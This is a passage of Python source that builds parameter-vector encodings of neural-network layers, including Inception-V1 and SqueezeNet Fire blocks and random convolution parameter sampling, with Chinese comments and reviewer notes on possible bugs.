        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel* 0.125)
        #     out_channel_3_hidden = int(out_channel_3 /2)
        #     out_channel_4 = int(in_channel*0.125)
        # #1.5758
        # elif block_type == 7:
        #     out_channel_1 = int(in_channel*0.485)
        #     out_channel_2 = int(in_channel * 0.606)
        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel* 0.2424)
        #     out_channel_3_hidden = int(out_channel_3 /4)
        #     out_channel_4 = int(in_channel*0.2424)
        # #1
        # elif block_type == 8:
        #     out_channel_1 = int(in_channel*0.3077)
        #     out_channel_2 = int(in_channel * 0.3846)
        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel* 0.1538)
        #     out_channel_3_hidden = int(out_channel_3 /4)
        #     out_channel_4 = int(in_channel*0.1538)
        # #1.2367
        # elif block_type == 9:
        #     out_channel_1 = int(in_channel*0.4615)
        #     out_channel_2 = int(in_channel * 0.4615)
        #     out_channel_2_hidden = int(out_channel_2/2)
        #     out_channel_3 = int(in_channel* 0.1538)
        #     out_channel_3_hidden = int(out_channel_3 /3)
        #     out_channel_4 = int(in_channel*0.1538)
        branch1_index = last_block_index
        # Branch1 #1: 1x1 conv
        in_channel = input_size[1]
        conv_params = [in_channel,out_channel_1, 1,1, 1,1, 0,0, 1,1, 1]
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch1 #2: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # Branch1 #3: ReLU (flattened length = channels x spatial dims of input_size)
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        branch1_res_index = self.layer_num - 1
        # Branch2 #1: 1x1 reduce conv
        in_channel = input_size[1]
        out_channel = final_output_size[1]  # NOTE(review): assigned but unused in this branch
        conv_params = [in_channel,out_channel_2_hidden, 1,1, 1,1, 0,0, 1,1, 1]
        # NOTE(review): the recorded input size here is last_layer_input_size
        # (branch1's conv output) even though this layer links to
        # last_block_index; branch3 uses input_size instead — confirm which
        # encoding is intended.
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch2 #2: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # Branch2 #3: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        # Branch2 #4: 3x3 conv
        conv_params = [out_channel_2_hidden,out_channel_2, 3,3, 1,1, 1,1, 1,1, 1]
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch2 #5: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # Branch2 #6: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        branch2_res_index = self.layer_num - 1
        # Branch3 #1: 1x1 reduce conv
        in_channel = input_size[1]
        out_channel = final_output_size[1]  # NOTE(review): assigned but unused in this branch
        conv_params = [in_channel,out_channel_3_hidden, 1,1, 1,1, 0,0, 1,1, 1]
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch3 #2: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # Branch3 #3: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        # Branch3 #4: 5x5 conv, padding 2
        conv_params = [out_channel_3_hidden,out_channel_3, 5,5, 1,1, 2,2, 1,1, 1]
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch3 #5: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # Branch3 #6: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        branch3_res_index = self.layer_num - 1
        # Branch4 #1: 3x3 max pool, stride 1, padding 1 (keeps spatial size)
        pooling_params = [3,3, 1,1, 1,1, 1,1, 0]
        params = input_size + [0,0,0,0] + pooling_params
        output_size = self.get_output_size(params,7,input_size)
        params = input_size + output_size + pooling_params
        self.layer_parameters += params # append to the parameter vector
        link_list = [last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [7] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch4 #2: 3x3 conv, padding 1
        # NOTE(review): the reference module uses a 1x1 conv in branch4;
        # this encodes a 3x3 conv — confirm intent.
        in_channel = input_size[1]
        conv_params = [in_channel,out_channel_4, 3,3, 1,1, 1,1, 1,1, 1]
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # Branch4 #3: BatchNorm2d
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16] # append to the layer-id list
        self.layer_num += 1
        # Branch4 #4: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        branch4_res_index = self.layer_num - 1
        # concatenation of the four branches along the channel axis
        final_out_channels = out_channel_1 + out_channel_2 + out_channel_3 + out_channel_4
        output_size = [1,final_out_channels,last_layer_input_size[2],last_layer_input_size[3]]
        # concat layer (id 23) linking all four branch tails
        layer_output_index_list = [branch1_res_index,branch2_res_index,branch3_res_index,branch4_res_index]
        params = self.make_layer(23,output_size,out_channels=final_out_channels)
        self.layer_parameters += params # append to the parameter vector
        self.layer_link += self.get_link_vector(layer_output_index_list,self.layer_num)
        self.layer_id += [23] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # decide whether a stride-2 pooling layer is needed to reach final_output_size
        in_height = input_size[2]
        out_height = final_output_size[2]
        if in_height == out_height:
            #print('==make_inceptionV1_block',last_layer_input_size)
            return self.layer_num - 1,last_layer_input_size
        elif in_height == 2*out_height:
            # append a stride-2 max pool to halve the spatial size
            pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
            params = last_layer_input_size + [0,0,0,0] + pooling_params
            output_size = self.get_output_size(params,7,last_layer_input_size)
            params = last_layer_input_size + output_size + pooling_params
            self.layer_parameters += params # append to the parameter vector
            link_list = [self.layer_num - 1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [7] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            #print('2*make_inceptionV1_block',last_layer_input_size)
            return self.layer_num - 1,last_layer_input_size
        else:
            # NOTE(review): this path implicitly returns None; callers unpack
            # two values, so it would raise TypeError at the call site —
            # confirm whether an explicit exception is preferable.
            print('Inception Wrong')
    def make_squeeze_fire_block(self,last_block_index,input_size,final_output_size):
        '''
        Encode one SqueezeNet "Fire" module. Mirrors:
        (8): Fire(
          (squeeze): Sequential(
            (0): Conv2d(256, 48, kernel_size=(1, 1), stride=(1, 1))
            (1): ReLU(inplace=True)
          )
          (expand_1): Sequential(
            (0): Conv2d(48, 192, kernel_size=(1, 1), stride=(1, 1))
            (1): ReLU(inplace=True)
          )
          (expand_3): Sequential(
            (0): Conv2d(48, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
            (1): ReLU(inplace=True)
          )
        )

        The two expand branches both read the squeeze output and are then
        concatenated (layer id 23). final_output_size is accepted for
        interface symmetry with the other block builders but is not read.
        Returns (index of the concat layer, its output size).
        '''
        in_channel = input_size[1]
        # sample the squeeze width, then shrink it again if it came out too wide
        squeeze_hidden_channel = self.prob_random([int(in_channel/4), int(in_channel/6), int(in_channel/8)],[0.05,0.2,0.75])
        if squeeze_hidden_channel > 300:
            squeeze_hidden_channel = self.prob_random([squeeze_hidden_channel,int(squeeze_hidden_channel/2),int(squeeze_hidden_channel/3)],[0.1,0.7,0.2])
        # both expand branches widen 4x, like the canonical Fire module
        expand_1_out_channel = squeeze_hidden_channel * 4
        expand_2_out_channel = expand_1_out_channel
        # squeeze #1: 1x1 conv
        in_channel = input_size[1]
        conv_params = [in_channel,squeeze_hidden_channel, 1,1, 1,1, 0,0, 1,1, 1]
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # squeeze #2: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        block_index = self.layer_num - 1
        # expand_1 #1: 1x1 conv
        in_channel = input_size[1]  # NOTE(review): assigned but unused; conv_params uses squeeze_hidden_channel
        conv_params = [squeeze_hidden_channel,expand_1_out_channel, 1,1, 1,1, 0,0, 1,1, 1]
        # NOTE(review): the recorded input size is input_size (block input)
        # although this layer links to the squeeze output (block_index) —
        # confirm whether the squeeze output size should be recorded instead.
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # expand_1 #2: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        branch1_res_index=self.layer_num - 1
        # expand_3 #1: 3x3 conv, padding 1
        conv_params = [squeeze_hidden_channel,expand_2_out_channel, 3,3, 1,1, 1,1, 1,1, 1]
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params # append to the parameter vector
        link_list=[block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1] # append to the layer-id list
        self.layer_num += 1
        last_layer_input_size = output_size
        # expand_3 #2: ReLU
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params # append to the parameter vector
        link_list=[self.layer_num - 1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22] # append to the layer-id list
        self.layer_num += 1
        branch2_res_index=self.layer_num - 1
        # channel-axis concatenation of the two expand branches
        final_out_channels = expand_1_out_channel + expand_2_out_channel
        output_size = [1,final_out_channels,last_layer_input_size[2],last_layer_input_size[3]]
        # concat layer (id 23)
        layer_output_index_list = [branch1_res_index,branch2_res_index]
        params = self.make_layer(23,output_size,out_channels=final_out_channels)
        self.layer_parameters += params # append to the parameter vector
        self.layer_link += self.get_link_vector(layer_output_index_list,self.layer_num)
        self.layer_id += [23] # append to the layer-id list
        self.layer_num += 1
        #print('fire',output_size)
        return self.layer_num - 1,output_size
def get_output_size(self,parameters,layer_id,input_size):
if(layer_id == 0):
in_channels,out_channels,kernel_size,stride,padding,dilation,groups = parameters[-7:]
elif(layer_id == 1):
batch_size,channel,input_height,input_width = input_size
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = parameters[-11:]
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
return [batch_size,out_channels,out_height,out_width]
elif(layer_id == 2):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups = parameters[-15:]
elif(layer_id == 3):
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = parameters[-8:]
elif(layer_id == 4):
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups = parameters[-12:]
elif(layer_id == 5):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,\
padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,dilation,groups = parameters[-16:]
elif(layer_id == 6):
kernel_size,stride,padding,dilation,pool_type = parameters[-5:]
elif(layer_id == 7):
batch_size,channel,input_height,input_width = input_size
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = parameters[-9:]
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
return [batch_size,channel,out_height,out_width]
elif(layer_id == 8):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = parameters[-13:]
elif(layer_id == 9):
kernel_size,stride,padding = parameters[-3:]
elif(layer_id == 10):
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = parameters[-6:]
elif(layer_id == 11):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = parameters[-9:]
elif(layer_id == 12):
output_size_L,pool_type = parameters[-2:]
elif(layer_id == 13):
output_size_H,output_size_W,pool_type = parameters[-3:]
elif(layer_id == 14):
output_size_D,output_size_H,output_size_W,pool_type = parameters[-4:]
elif(layer_id == 15):
num_features = parameters[-1:][0]
elif(layer_id == 16):
num_features = parameters[-1:][0]
elif(layer_id == 17):
num_features = parameters[-1:][0]
elif(layer_id == 18):
probability = parameters[-1:][0]
elif(layer_id == 19):
probability = parameters[-1:][0]
elif(layer_id == 20):
probability = parameters[-1:][0]
elif(layer_id == 21):
batch_size = input_size[0]
input_length,output_length = parameters[-2:]
return [batch_size,input_length,batch_size,output_length]
elif(layer_id == 22):
sigmoid,tanh,ReLU,leaky_ReLU = parameters[-4:]
elif(layer_id == 23):
return input_size
elif(layer_id == 24):
return input_size
elif(layer_id == 25):
probability = parameters[-1:][0]
elif(layer_id == 26):
probability = parameters[-1:][0]
def make_layer(self,layer_id,input_size,output_size=None,add_num=None,out_channels=None,target_params=None):
# print(layer_id,input_size,output_size)
'''
layer_id:神经网络层的id
input_size: list
返回参数向量
'''
# print(layer_id,input_size,output_size)
if(layer_id == 0):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups = [0 for index in range(7)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0]
output_size = [input_size[0],out_channels,input_length]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(output_size==None):
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],out_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
in_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups]]
elif(layer_id == 1):
# print('1conv2d',input_size,output_size)
low_channel_prob = 0.5
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = [0 for index in range(11)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
# print(int(in_channels/0.8),int(in_channels*1.2))
out_channels = random.randint(int(in_channels*0.8),int(in_channels*1.2))
if self.large == 1 and out_channels > 600:
out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
elif self.large == 0 and out_channels > 200:
out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
# print('2conv2d',input_size,output_size)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.78,0.05,0.1,0.04,0.01,0.01,0.01])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(output_size==None):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],out_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups]]
elif(layer_id == 2):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,\
groups = [0 for index in range(15)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
# print('in_channels,out_channels,common_divisor',in_channels,out_channels,common_divisor)
#生成stride,padding
if(output_size==None):
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],out_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
#先寻找height width
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups]]
elif(layer_id == 3):
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = [0 for index in range(8)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_length]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_size = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
padding_size = random.randint(0,kernel_size)
ouput_length = output_padding_size + stride_size*(input_length - 1) - 2*padding_size + dilation_size*(kernel_size - 1) + 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_length]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding,output_padding,dilation_size,groups]]
elif(layer_id == 4):
#由于size无法成倍缩小,暂时只支持output_size = None
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,\
stride_width,padding_height,padding_width,dilation,groups,output_padding_height,output_padding_width = [0 for index in range(12)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
ouput_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
